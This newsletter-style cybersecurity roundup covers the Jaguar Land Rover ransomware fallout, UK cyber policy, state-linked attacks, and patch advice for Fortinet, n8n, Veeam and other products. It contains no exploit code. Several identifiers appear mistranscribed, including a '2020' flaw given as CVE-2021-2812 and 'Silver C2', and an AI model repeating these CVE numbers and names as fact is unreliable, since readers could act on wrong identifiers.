Good morning, Security Gang!

This week, cybersecurity stopped being theoretical and became brutally, undeniably economic reality. Jaguar Land Rover’s ransomware attack resulted in a 43% global sales collapse—North America down 64%, Europe down 48%, China down 46%—costing the company $220 million in a single quarter and forcing a £1.5 billion government bailout while the Bank of England cited the breach as a drag on national GDP.

Meanwhile, in an unprecedented admission of failure, the UK government launched a new Cyber Action Plan after openly declaring its government cyber risk “critically high” and admitting that legacy strategies, decentralized ownership, and fragmented responsibility have catastrophically failed proposing a centralized cyber command structure with mandatory MFA, logging, SBOM requirements, and measurable milestones across all critical sectors.

On the geopolitical front, China launched 2.63 million daily cyberattacks on Taiwan (a 113% increase over 2023) targeting energy, hospitals, and emergency services with attacks on the energy sector surging tenfold, while Trump ordered divestment of a $2.9 million Chinese semiconductor deal citing national security risks, and Finnish authorities arrested Russian ship crew members for deliberately cutting undersea Baltic telecom cables in what investigators are calling “an act of sabotage under the veil of maritime activity.”

Add in 10,000+ Fortinet firewalls still vulnerable to a 2020 MFA bypass that’s been patchable for five years, the first CVSS 10.0 vulnerability of 2026 in the n8n automation platform, a Chrome extension with 900,000 installs caught stealing AI chat logs and tokens, CISA’s Known Exploited Vulnerabilities Catalog growing by 20% to 1,480 CVEs, and LockBit 5.0 emerging leaner and faster while BlackCat ransomware gangs are literally buying Google Ads for SEO poisoning campaigns and you have a week that proves beyond any doubt that the kinetic-cyber line has disappeared, economic consequences are now the primary metric of cyber risk, and 2026 is the year when operational maturity stops being aspirational and becomes survival-critical.

Let’s break down the economic carnage, government admissions, geopolitical escalations, and the patches you should have applied five years ago—coffee ready, Security Gang, because this is what cyber risk looks like when it becomes real.

💰 CRITICAL INFRASTRUCTURE & ECONOMIC IMPACT

Jaguar Land Rover: 43% Sales Collapse Proves Cyber Is Economic Warfare

The fallout from Jaguar Land Rover’s ransomware attack continues—and it’s brutal. The company confirmed a 43% plunge in global wholesale volumes tied directly to the cyber incident. Production, logistics, and distribution all ground to a halt, crippling deliveries and inventory flow.

Regional Impact:

• North America: 64% sales decline

• Europe: 48% decline

• China: 46% decline

• UK: 0.9% decline (domestic operations cushioned the blow)

The attack cost the company roughly $220 million in one quarter, prompting a £1.5 billion government bailout. The Bank of England even cited the breach as a drag on national GDP.

James’s assessment was definitive: “This isn’t a network outage — it’s an economic event. A 43% global sales hit is what cyber risk looks like when it becomes real.”

This case will define how boards view cybersecurity in 2026—not as a cost center, but as a revenue protector and economic stability mechanism.

Sedgwick Confirms Ransomware Incident

Sedgwick, one of the largest third-party risk and claims management firms in the world, confirmed a cyber incident claimed by the TridentLocker ransomware gang. The attackers accessed a segmented file transfer system, leaked employee data samples, and are claiming credit.

Sedgwick says claims systems remain operational and no customer data was directly impacted, though investigators are still assessing potential PII exposure. For context, Sedgwick works with DHS, ICE, CISA, the Department of Labor, and other federal agencies—meaning federal employee data may be at risk if lateral movement occurred.

James noted: “If you’re in risk management and get hit yourself, it’s not just about forensics — it’s about credibility. How you respond defines whether clients stay or walk.”

This attack reinforces that identity remains the new perimeter—access abuse, credential reuse, and privilege escalation are the real battlegrounds.

Brightspeed Investigating Cyberattack

U.S. telecom provider Brightspeed confirmed it is investigating a cyber incident impacting its internal systems. Details are still limited, but the Crimson Collective hacking group has claimed responsibility, saying they stole customer and billing data, payment details, and service records.

If accurate, attackers may have gained ERP or Oracle EBS system access, exposing metadata, architecture diagrams, and subscriber information. This case highlights the increasing targeting of telecom infrastructure as a supply-chain vector for espionage and credential harvesting.

🏛️ GOVERNMENT POLICY & REGULATORY RESPONSE

UK Government Launches New Cyber Action Plan After Admitting Failure

In an unprecedented moment of governmental candor, the UK government announced a new Cyber Action Plan after acknowledging its old strategies failed. The initiative comes directly in response to the JLR attack and its impact on GDP.

The plan introduces baseline security controls across government and critical industry sectors:

• Mandatory MFA

• Enhanced logging

• Vulnerability management

• SBOM requirements

• Resilience testing for essential services

James emphasized: “The Brits just admitted what most governments won’t — that what they’ve been doing hasn’t worked. But this is their chance to build a real CISA-style response unit.”

The UK wants to build a centralized cyber command structure with mandatory standards, measurable milestones, and real funding. It’s modeled partly on CISA but gives more direct power to the new Government CISO.

However, there’s a tradeoff: Centralization can create resilience, or bureaucratic paralysis. The UK’s model works only if its leadership is competent—because, unlike the U.S.’s federated approach, this one lives or dies by the person in charge.

James explained the global models:

• UK: optimizes for control and execution

• U.S.: optimizes for scale and adaptability

• EU: optimizes for consistency

• Israel: optimizes for speed

• Singapore: optimizes for precision

Every model has tradeoffs—and the UK’s may prove to be the most daring experiment of 2026.

Australia’s Anti-Scam Framework Draws Fire

Australia rolled out its new National Anti-Scam Framework, but critics argue it leaves too many gaps, especially around key financial rails and certain online platforms. The framework sets out roles for regulators, banks, and telecoms—but still relies heavily on voluntary compliance.

James’s assessment was blunt: “If regulation moves slower than the scammer, it’s not regulation — it’s decoration.”

Organizations Should:

• Treat the framework as a floor, not a ceiling

• Implement enterprise-side holds on suspicious transactions

• Enforce beneficiary change callbacks and brand abuse takedowns

Illinois State Agency Exposes 700,000 Residents’ Data

The Illinois Department of Human Services (IDHS) confirmed a data exposure impacting 700,000 residents, including 672,000 Medicaid and Medicare Savings Program participants. Early indicators suggest this was a misconfiguration, not a hack—but the exposed records could still fuel identity theft and benefits fraud.

James emphasized: “Misconfigurations aren’t harmless — they’re doorways left open by neglect. And taxpayers always end up paying the bill.”

IDHS Must:

• Conduct asset inventories

• Perform access reviews

• Rotate keys

• Enable object-level logging

• Enforce MFA for all admins

🎯 GEOPOLITICAL CYBER WARFARE

Trump Orders Divestment in $2.9M Chinese Chip Deal

In a move blending geopolitics and cybersecurity, President Trump ordered a divestment of a $2.9 million semiconductor deal between aerospace defense supplier EmmaCorp and Chinese buyer He Fu, citing national security risks.

The White House says the divestment order was based on credible evidence the acquirer is a Chinese citizen and that the deal could give Beijing access to sensitive U.S. chip fabrication technology. The president has given 180 days for full separation.

James called it plainly: “Trump’s not just blocking chips — he’s signaling to China that technology is the new terrain of deterrence.”

Following Maduro’s capture—and his prior meeting with Chinese officials—this move rattled markets and sent a clear message: the U.S. is drawing hard lines between national defense and foreign tech influence. Expect a more aggressive Chinese posture in cyberspace this quarter.

China’s Cyber Pressure on Taiwan Escalates

Taiwan’s National Security Bureau reported a staggering 2.63 million daily cyberattacks in 2025—a 113% increase over 2023—most linked to China’s People’s Liberation Army (PLA). Targets included energy, emergency services, and hospitals, reflecting China’s hybrid warfare model.

China’s Energy Attacks on Taiwan Surge Tenfold

Taiwan’s energy sector is now facing a tenfold increase in cyberattacks from China’s military-linked groups. These attacks target operational and billing systems—aiming to disrupt maintenance and power distribution.

What’s fascinating is the timing. Just as the U.S. carried out a covert nighttime extraction operation in Venezuela, cutting power in Caracas, China’s escalation against Taiwan may have been a test case.

James observed: “This isn’t just hacking — it’s geopolitical signaling. The U.S. flipped Caracas’s lights out to send Beijing a message: we can do to you what you plan to do to Taipei.”

These attacks blend credential abuse, phishing, and living-off-the-land tactics to burrow into vendor networks. CISOs with East Asia dependencies must segment, monitor, and validate every connection—because the cyber-kinetic line is fading fast.

Baltic Cable Sabotage Under Investigation

In a story blending kinetic and cyber, Finnish authorities arrested two crew members of a Russian-linked cargo ship suspected of damaging undersea telecom cables in the Baltic Sea.

The ship, Fitzberg, carried sanctioned Russian steel and was reportedly dragging anchors or heavy gear that cut fiber cables operated by Finnish telecom Elisa in Estonia’s EEZ. Finland’s National Bureau of Investigation is leading the probe, calling it “an act of sabotage under the veil of maritime activity.”

James put it perfectly: “The kinetic side of cyber isn’t going away — it’s the other half of the same coin. You cut cables, you cut comms — and that’s war in 2026.”

Russia-Linked Malware Hits European Hospitality Sector

Russia-linked threat group Fancy Bear (APT28) has been deploying malicious drivers that trigger Blue Screen of Death restarts across European hospitality networks. This isn’t a destructive attack—it’s stealth. The forced reboots allow malware to establish persistence at a low-noise level.

If you operate in travel, retail, or hotel IT:

• Assume thin-client exposure

• Enable Device Guard

• Implement allowlisting

• Enforce signed driver enforcement across your fleet

James noted: “Russia’s not targeting guests — they’re targeting confidence. If Europe’s tourism engine stutters, its economy follows.”

Russia Abuses Viber Messaging Platform in Ukraine

Russia-aligned actors are also exploiting the Viber messaging platform in the Russia–Ukraine conflict to distribute info-stealers and misinformation campaigns. The method involves phishing ZIP files disguised as Office documents. Once opened, LNK loaders fetch payloads using PowerShell and connect to C2 servers.

While Viber isn’t popular in the U.S., this tactic shows how trusted consumer platforms are being weaponized for espionage and disruption.

Chinese Scam Kingpin Arrested and Extradited

Authorities in Cambodia arrested Chen Zhi, head of the Prince Group—a conglomerate accused of running massive scam call centers, human trafficking operations, and crypto laundering networks worth over $15 billion.

Chen was extradited to China rather than the U.S. or UK, keeping the case inside Beijing’s legal jurisdiction. Western intelligence sources believe this is less about justice and more about damage control, since Chinese officials were allegedly tied to the same scam syndicates.

James observed: “China’s cleaning house in public, but make no mistake — this was a cover-up dressed as cooperation.”

🔗 THIRD-PARTY & SUPPLY CHAIN COMPROMISES

Ledger Customers Impacted by Global-E Vendor Breach

Ledger, the crypto hardware wallet company, confirmed some customer data was exposed following a breach at e-commerce partner Global-E. While wallet hardware and keys remain secure, threat actors now have access to accurate contact details, shipping addresses, and transaction histories—the perfect recipe for phishing and BEC.

James was blunt: “If you’re changing vendor banking info over email in 2026, you’re already behind the eight ball.”

Companies Should:

• Block scam domains targeting vendor customer portals

• Enforce banking info changes through secure portals, not via email

• Launch proactive takedown campaigns to preempt fraud attempts

ReSecurity Turns Hack Into Honeypot Victory

Cyber firm ReSecurity found itself at the center of controversy after the Scattered Lapsus group claimed to have breached its systems. They posted what they said were internal chats and client logs.

But ReSecurity immediately pushed back—revealing it was actually a deception campaign. The data came from a staged honeypot environment, built to gather threat telemetry and attacker TTPs.

James’s advice: “Plan your communications strategy before a honeypot goes public. Threat actors love to overhype fake breaches. Handle it right, and it’s a win.”

NordVPN Denies Breach Claims

Threat actors claimed to have exfiltrated NordVPN’s user data, but the company quickly denied the claims, saying the leaked information was dummy data from a non-production environment.

James noted: “I’m not quick to believe hackers. In 2026, fake data is bait — and companies are finally smart enough to use it.”

While skepticism is healthy, this story underscores how development environments remain underprotected. Many lack endpoint controls or telemetry, making them an easy target for both real and deceptive breaches.

🔥 CRITICAL VULNERABILITIES & ZERO-DAYS

10,000+ Fortinet Firewalls Still Exposed to 2FA Bypass

Here’s the jaw-dropper: 10,000 Fortinet firewalls remain vulnerable to a 2020 MFA bypass flaw (CVE-2021-2812). Shadowserver’s scans show LDAP-enabled configurations are most at risk. The fix has been out for five years, but admins still haven’t patched.

Update immediately to:

• 6.4.1+

• 6.2.4+

• 6.0.10+

Or at minimum enforce username case sensitivity and review SSL VPN logs for mismatched casing.

Unpatched Fortinet = open door to ransomware. Full stop.

n8n Automation Platform: CVSS 10.0 RCE - First CVE of 2026

Open-source workflow tool n8n disclosed a CVSS 10.0 remote code execution vulnerability (CVE-2026-21877)—the first CVE of 2026. Low-code automation tools often run with broad API and credential access, making this flaw particularly dangerous.

Organizations Should:

• Upgrade to version 1.121.3 or later

• Restrict admin access to VPN or allowlists

• Rotate API keys immediately

James emphasized: “n8n is the new shadow IT — it’s what connects your workflows, but it’s also what attackers can use to own them.”

Veeam Fixes Critical RCE Vulnerability

Veeam issued an urgent patch for CVE-2025-5470, a remote code execution flaw in its Backup & Replication software, rated 9.0 CVSS. Attackers exploiting this bug could gain control over backup servers, pivot laterally, and disable ransomware recovery.

Patch now:

• Remove public management access

• Rotate credentials

• Alert on unexpected restore or export jobs

This vulnerability hits the heart of business continuity systems—and that’s where attackers strike hardest.

Android Patches Critical Dolby RCE Flaw

Google’s January patch dropped with a critical Dolby Media Framework vulnerability (CVE-2025-5549) enabling remote code execution via crafted media files. This flaw lives in devices your staff carry into meetings every day.

Push this update immediately—especially on devices accessing enterprise SaaS apps or communications platforms. Enforce patch levels enterprise-wide through MDM policies and block unknown media attachments.

Adobe ColdFusion Servers Under Coordinated Attack

Researchers at GrayNoise detected a coordinated exploitation campaign targeting unpatched or misconfigured Adobe ColdFusion servers. Attackers are deploying web shells and backdoors to maintain persistence.

Organizations running ColdFusion should immediately:

• Confirm patch levels

• Disable admin interfaces from the internet

• Sweep for unexpected CFIDE artifacts or web shells

If you’re still running legacy ColdFusion workloads—isolate them now. These are high-value targets for ransomware operators.

VMware ESXi Exploit Toolkit Targets Legacy Servers

A new turnkey exploit kit is spreading rapidly among attackers targeting unpatched VMware ESXi servers. The toolkit chains old CVEs with weak management exposures to deploy ransomware or steal credentials.

Admins Should:

• Patch ESXi to supported builds

• Hide vSphere and vCenter behind VPNs and IP allowlists

• Rotate datastore credentials

• Alert on sudden snapshot or encryption bursts

James emphasized: “ESXi is the crown jewel of compute — treat it like it.”

Critical JS PDF Flaw Enables Secret Data Theft

A critical flaw in JS PDF, the open-source library used to generate PDFs, lets attackers embed malicious JavaScript that steals secrets and tokens when opened.

Developers Should:

• Upgrade JS PDF to the latest version

• Add Content Security Policy (CSP) headers

• Sandbox untrusted PDFs in isolated viewers

Treat inline PDFs as executable content—because they are.

FortiWeb Exploited to Drop Silver C2 Framework

Researchers uncovered multiple FortiWeb edge devices being exploited to deploy Silver C2 beacons using outdated firmware versions. Attackers also paired this with React2Shell vulnerabilities, combining RCE with stealthy lateral movement.

If you’re running FortiWeb:

• Patch immediately to 6.1.62+

• Audit for Silver C2 artifacts and FRP binaries

• Rotate TLS keys and admin credentials post-incident

D-Link DSL Routers Exploited

Attackers are exploiting a remote code execution flaw in legacy D-Link DSL routers, turning them into footholds into corporate SaaS environments.

If your branch offices or rural sites still run DSL:

• Isolate devices behind an ISP router

• Disable remote admin access

• Monitor for DNS tampering or rogue egress traffic

Or better yet—replace them. James quipped: “If you’re still on DSL in 2026, it’s time to join the rest of the century — Starlink’s calling.”

Doticat Malware Targets Microsoft Exchange Servers

The Doticat malware is actively exploiting unpatched Microsoft Exchange servers via IIS modules, performing credential harvesting and mailbox exfiltration.

Enterprises Should:

• Upgrade to supported Exchange builds

• Enable extended protection

• Rotate service credentials and certificates

• Watch for odd mailbox export spikes or child processes linked to Exchange

CISA KEV Catalog Grows by 20%

CISA’s Known Exploited Vulnerabilities (KEV) Catalog expanded by 20% in 2025, now including 1,480 CVEs—a stark reminder that exploited CVEs should drive your patching priorities.

Top exploit types:

• Command injection: 18

• Deserialization: 14

• Path traversal: 13

• Use-after-free: 11

James was emphatic: “If you’re still patching by CVSS score instead of active exploitation — you’re doing it wrong.”

💣 RANSOMWARE & MALWARE OPERATIONS

LockBit 5.0 Ransomware Emerges

LockBit 5.0 is back—leaner, faster, and nastier. Despite multiple takedowns, LockBit’s infrastructure has re-emerged with automated initial access tools and faster encryption speed.

Defenders Should:

• Prioritize patching KEV vulnerabilities

• Disable VPNs without MFA

• Hunt for common loader chains like Office macros, archives, and PowerShell-based loaders

LockBit’s persistence proves one thing: ransomware isn’t dying—it’s industrializing.

BlackCat/AlphaV Launch SEO Poisoning Malware Campaign

The BlackCat ransomware gang (also known as AlphaV) is using SEO poisoning to lure victims. Search results for popular software now lead to Trojanized installers that infect admins and power users.

To Defend:

• Block ads of unknown origin

• Download only from verified publisher stores

• Deploy EDR tuned for PowerShell and LOLBin abuse

James joked: “If ransomware gangs are buying Google Ads, maybe the problem isn’t security — it’s marketing.”

RondoDox Botnet Weaponizes React2Shell

A new botnet named RondoDox is exploiting React2Shell vulnerabilities to recruit infected nodes and deploy payloads. This is a continuation of the React2Shell ecosystem exploits (CVE-2025-55182), where attackers leverage vulnerable middleware for command injection.

You Should:

• Enable WAF virtual patching rules

• Lock admin routes

• Monitor for unusual tunneling behavior

🤖 AI SECURITY & EMERGING THREATS

AI Prompt Injection: The Long-Term Threat

OpenAI reaffirmed that prompt injection—malicious content that manipulates model behavior—remains a long-term, unsolved problem in AI systems.

The company advised enterprises piloting AI integrations to:

• Treat model inputs like untrusted user data

• Implement context firewalls and retrieval limits

• Require human-in-the-loop approval for sensitive actions

James emphasized: “AI isn’t hacking us — people are hacking the inputs. That’s the problem we’re not ready for.”

AI adoption without security guardrails will create more chaos than efficiency.

Chrome Extension Stealing AI Chats Hits 900K Installs

A malicious Chrome extension called AI Helper with over 900,000 installs was caught stealing AI-generated chat logs, tokens, and user data. This means intellectual property, code snippets, and even confidential deal drafts pasted into AI tools were being exfiltrated in real time.

To Mitigate:

• Restrict corporate Chrome to an allowlist

• Ban unsanctioned AI extensions

• Adopt enterprise AI tenants with DLP and retention policies

James reminded listeners: “If you’re pasting code or contracts into a web UI, you’re not chatting — you’re leaking.”

📊 DATA BREACHES & EXPOSURES

Iberia Airlines: ‘New’ Breach Is Just Old News

Spanish national carrier Iberia Airlines pushed back on claims of a “new” data breach, saying the data currently circulating online comes from the November 2025 incident it already disclosed and contained.

Threat actors are repackaging old data and reselling it as fresh leaks—a tactic we’ve seen repeatedly this month.

James noted: “Threat actors dabble in crime, not truth. Every time they rehash old data, it’s not a hack — it’s a hustle.”

The repackaged dump could still harm customers through loyalty fraud and refund scams, so Iberia customers should:

• Reset passwords and enable MFA

• Monitor loyalty point balances for unusual activity

• Step up risky login monitoring and credential stuffing defense

🌐 CLOUD & EMAIL INFRASTRUCTURE ABUSE

Attackers Abuse Google Cloud Email to Evade Filters

Check Point researchers discovered cybercriminals abusing Google Cloud’s trusted email infrastructure to boost spam delivery rates and bypass corporate filters. By sending through legitimate Gmail API chains, attackers improve inbox placement and evade DMARC and SPF checks.

To Counter This:

• Enforce strict DKIM and SPF alignment

• Reduce implicit trust in cloud-originating mail

• Monitor API service account activity

This is another example of attackers weaponizing trusted cloud infrastructure to exploit enterprise trust models.

OwnCloud Urges MFA After Credential Thefts

After multiple credential theft incidents, OwnCloud is now urging users to enable phishing-resistant MFA, rotate admin keys, and restrict admin panels behind VPN or IP allowlists.

🎭 DECEPTION OPERATIONS & UNUSUAL INCIDENTS

White Supremacist Dating Site Hacked - “okstupid.lol“

To close one show, a German hacker known as Martha Root—dressed as a pink Power Ranger—breached a white supremacist dating site and dumped the data online under okstupid.lol.

It’s both absurd and oddly poetic: a Power Ranger exposing hate groups looking for love. Root’s hack revealed thousands of extremist profiles across Europe and the U.S.

✅ YOUR COMPREHENSIVE ACTION LIST

IMMEDIATE CRITICAL PATCHING:

1. 🧱 Fortinet Firewalls - 10,000+ still vulnerable to 2020 MFA bypass (5 YEARS unpatched!) - update to 6.4.1+, 6.2.4+, or 6.0.10+

2. 🔐 n8n Automation Platform - CVSS 10.0 RCE (CVE-2026-21877) - upgrade to 1.121.3+

3. 💾 Veeam Backup - Critical RCE (CVE-2025-5470) threatens ransomware recovery - patch immediately

4. 📱 Android Dolby - CVE-2025-5549 RCE via crafted media - deploy January patch via MDM

5. 🧱 Adobe ColdFusion - Under coordinated attack - patch, disable admin interfaces, sweep for web shells

6. 💻 VMware ESXi - Turnkey exploit kit circulating - patch to supported builds; hide vCenter behind VPN

7. 📄 JS PDF - Critical flaw enables secret theft - upgrade library; add CSP headers

8. 🔥 FortiWeb - Silver C2 deployment via outdated firmware - patch to 6.1.62+

9. 📡 D-Link DSL Routers - RCE being actively exploited - replace or isolate immediately

10. 📧 Microsoft Exchange - Doticat malware targeting IIS modules - upgrade to supported builds

ECONOMIC & BUSINESS IMPACT:

• 🚗 Use JLR as case study - Quantify cyber risk in revenue/GDP terms for board presentations

• 💼 Credibility assessment - If you manage risk and get breached, response defines whether clients stay

• 📊 Track economic impact metrics - Sales drops, bailout requirements, GDP citations

RANSOMWARE & MALWARE DEFENSE:

• 💣 Harden VPNs with MFA - Hunt for PowerShell execution chains (LockBit 5.0)

• 🚫 Block SEO-malware ads - Train users to verify installers (BlackCat Google Ads)

• ⚙️ Apply WAF and EDR rules - For React2Shell/Node.js apps (RondoDox botnet)

• 🔍 Hunt for Silver C2 artifacts - And FRP binaries in FortiWeb environments

• 📊 Monitor backup operations - For anomalies; alert on unexpected restores

AI SECURITY:

• 🤖 Treat model inputs as untrusted - Implement context firewalls (OpenAI prompt injection)

• 🧩 Whitelist Chrome extensions - Disable unsanctioned AI plugins (900K installs stealing chats)

• 📊 Adopt enterprise AI tenants - With DLP and retention policies

• 🔐 Deploy AI context isolation - User intent validation for sensitive actions

EMAIL & CLOUD INFRASTRUCTURE:

• 📧 Tighten Google Cloud API policies - Enforce email alignment standards (Check Point research)

• 🔐 Enforce strict DKIM/SPF alignment - Reduce implicit trust in cloud-originating mail

• 📊 Monitor API service account activity - For abuse of trusted infrastructure

DATA BREACH RESPONSE:

• ✈️ Audit loyalty systems - For fraudulent redemptions; enable MFA (Iberia recycled breach)

• 🏢 Illinois lesson - Conduct asset inventories, access reviews, key rotations

• 🔑 Cross-reference breach data - With internal user bases; force resets where overlap exists

INFRASTRUCTURE & EDGE SECURITY:

• 🧱 Segment IT/OT networks - Gate vendor access behind VPNs, MFA, IP allowlists

• 🔐 Remove public admin interfaces - For all edge devices and management planes

• 📊 Rotate device tokens - And admin credentials post-incident

• 💾 Hide vSphere/vCenter - Behind VPNs; rotate datastore credentials

DETECTION & THREAT HUNTING:

• 🔍 Monitor for DNS tampering - Or rogue egress traffic (D-Link DSL routers)

• 🎯 Watch for odd mailbox export spikes - Child processes linked to Exchange (Doticat)

• 🚨 Hunt for unusual tunneling behavior - Admin route abuse (React2Shell/RondoDox)

• 📊 Alert on sudden snapshot bursts - Or encryption activity (VMware ESXi)

Leave a comment

🧠 JAMES AZAR’S CISO TAKE

This week delivered the wake-up call that CISOs have been warning boards about for years: cybersecurity failures don’t just cost money in incident response fees or ransom payments—they collapse revenues, crash GDP, and force government bailouts. Jaguar Land Rover’s 43% global sales drop costing $220 million in a single quarter while requiring a £1.5 billion government bailout and getting cited by the Bank of England as a drag on national GDP proves beyond any doubt that cyber risk is economic risk, and when our defenses fail, the entire business ecosystem pays the price.

Meanwhile, the UK government’s unprecedented admission that its cyber strategies failed and that government risk is “critically high” represents a watershed moment in how nations approach cybersecurity finally acknowledging that fragmentation, not sophistication of attackers, is the biggest threat to government cybersecurity. When you combine this with China launching 2.63 million daily attacks on Taiwan with energy sector attacks surging tenfold, Russian ships physically cutting undersea cables in the Baltic Sea, Trump blocking Chinese semiconductor deals citing national security, and the realization that 10,000+ Fortinet firewalls remain vulnerable to a 2020 MFA bypass that’s been patchable for five years—the message is unmistakable:

2026 is the year when cyber resilience stops being theoretical and becomes operational, when patch management stops being a compliance checkbox and becomes an economic imperative, and when the kinetic-cyber line disappears entirely as submarines cut cables and ransomware collapses manufacturing operations simultaneously.

The second defining message from this week is that our job as security practitioners isn’t perfection—it’s finding risk, explaining risk, and accepting whatever risk tolerance the business chooses, because the shortest path to revenue will always trump the right path since the right path never exists. From the n8n CVSS 10.0 vulnerability proving that shadow IT workflow tools are the new attack surface, to Chrome extensions with 900,000 installs stealing AI chat logs and intellectual property in real time, to OpenAI confirming that prompt injection remains an unsolved long-term problem, to LockBit 5.0 emerging leaner and faster while BlackCat literally buys Google Ads for SEO poisoning campaigns the threat landscape has industrialized faster than our defenses have matured.

And when CISA’s KEV Catalog grows by 20% to 1,480 actively exploited CVEs while CISOs are still patching by CVSS scores instead of active exploitation, when Sedgwick gets ransomwared while managing risk for DHS and CISA, when Illinois exposes 700,000 Medicaid recipients through a misconfiguration, and when threat actors are literally repackaging old breach data and selling it as new leaks because the reputational damage never expires—we’re not dealing with a technical problem, we’re dealing with a maturity and discipline gap. The UK’s bold centralization experiment may succeed or create bureaucratic paralysis, Australia’s anti-scam framework may be decoration rather than regulation, and China may be cleaning house publicly while covering up official complicity but the universal truth across all these stories is that cyber resilience in 2026 will be defined by operational maturity, patch velocity, vendor validation, and the willingness to quantify cyber risk in revenue and GDP terms rather than compliance frameworks.

Because when the kinetic side of cyber cuts undersea cables while ransomware collapses automotive sales by 43%, we’re not defending networks anymore—we’re defending economic stability and national security simultaneously.

The age of theoretical cyber risk is over. JLR proved breaches collapse revenues and GDP. The UK admitted fragmentation failed. The kinetic-cyber line disappeared in the Baltic Sea. 2026 is when operational maturity becomes survival-critical.

Stay sharp, stay operational, patch what’s exploited not what’s scored, and as always—stay cyber safe, Security Gang!

Thanks for tuning in. We’ll be back Monday at 9 AM Eastern Live with all the latest!